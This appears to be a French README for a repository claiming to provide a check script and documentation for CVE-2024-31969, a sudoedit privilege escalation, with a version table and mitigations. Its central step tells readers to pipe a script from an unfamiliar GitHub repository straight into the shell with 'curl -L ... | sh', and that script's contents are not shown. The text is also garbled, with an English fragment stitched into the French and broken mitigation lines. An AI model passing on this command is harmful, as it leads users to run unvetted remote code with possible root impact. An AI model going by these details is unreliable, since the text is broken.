
Fournit un script de vérification de preuve de concept et une documentation pour CVE-2024-31969, une élévation de privilèges locale dans sudoedit de sudo, incluant les versions concernées et des recommandations d'atténuation.
CVE-2024-31969 est une vulnérabilité d'élévation de privilèges locale dans sudo lors de l'utilisation de la commande sudoedit.
Cette vulnérabilité a été introduite depuis sudo 1.9.0 en raison de la manière dont sudoedit valide les variables d'environnement de l'utilisateur et la propriété des fichiers de manière insuffisante.
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
Cette vulnérabilité permet à un utilisateur local disposant d'un accès sudoedit de modifier des fichiers arbitraires en tant que root via la manipulation de variables d'environnement telles que SUDO_EDITOR, ou en exploitant un symlink.
| Version de Sudo | Statut |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Vulnérable |
| 1.9.15p5 et supérieures | ✅ Sûr |
| 1.8.x (y compris 1.8.23) | ❌ Non concerné |
Exécutez la commande suivante :
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo vers la version 1.9.15p5 ou une version plus récente.sudoers qui autorisent sudoedit pour les utilisateurs non-root.env_keep ou env_reset sécurisée dans le fichier /etc/sudoers.Ce dépôt a été créé à des fins éducatives et de documentation sur la sécurité des systèmes.
Il est strictement interdit d'utiliser ces informations pour des activités illégales ou sans autorisation écrite du propriétaire du système.
Toute forme d'utilisation abusive relève entièrement de la responsabilité de l'utilisateur.